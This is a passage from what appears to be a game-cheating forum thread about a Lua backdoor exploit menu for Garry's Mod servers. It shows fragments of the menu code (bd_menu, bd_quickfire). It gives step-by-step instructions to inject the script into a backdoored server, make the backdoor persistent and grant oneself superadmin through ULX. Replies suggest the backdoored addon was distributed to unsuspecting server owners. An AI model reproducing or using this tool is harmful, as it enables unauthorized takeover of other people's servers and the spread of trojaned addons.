    ******:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
    ******:SetPos( 0, 0 )
    ******.Paint = function(panel, w, h)
    ******.DoClick = function()
    if table.HasValue( selectedplayers, v ) then
    table.RemoveByValue( selectedplayers, v )
    table.insert( selectedplayers, v )
    Plist4:AddItem( plypanel2 )
    BD.GenerateBackdoorList( Plist, 1 )
    BD.GenerateBackdoorList( Plist2, 2 )
    BD.GenerateBackdoorList( Plist3, 3 )
    concommand.Add("bd_menu", BD.BackdoorMenu)
    function BD.QuickFireBackdoor()
    	if !BD.BDMacros[selectedbackdoor] or selectedbackdoor == "" then BD.ChatText( "You haven't even selected a macro to use ya dingus!", Color(255,155,155) ) return end
    	if BD.BDMacros[selectedbackdoor].Type == ( 1 or 3 ) then BD.FormatCodeGlobal() else BD.FormatCodeTargeted() end
    concommand.Add("bd_quickfire", BD.QuickFireBackdoor)
    then go onto the server wich is backdoored, inject the lua with any method you want (external is one of the best) (command for external is : external somename.lua)
    then type "bd_menu" in console and select "Generic" then choose what you wanna do and enjoy ;') (Make the backdoor persistent first)
    (Click on Activate Backdoor once your exploit and backdoor is selected, it will execute the exploit (some exploits needs macro wich are defined in the description of each exploit))

    if it says backdoor is malfunctioning or not present try to type "bd_refresh_backdoors" if it doesn't work it means the addon isn't installed correctly (or not at all) or you fucked up something.


    To get superadmin scroll down and click on "ULX Set Access" then select yourself in "Players to target" , type the rank wanted into the macro field (superadmin in that case) then just click on activate backdoor and you'll get superadmin ^^

  8. #7
    gefunkel's Avatar
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    Quote Originally Posted by UTPEEND View Post
    The addon code is the addon that contains the backdoor I assume OP has uploaded their backdoored addon somewhere for Server owners to download

  9. #8
    Deyla Catherina's Avatar
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    Sep 2015

  10. #9
    svyanov's Avatar
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    example with backdoored servers logging:

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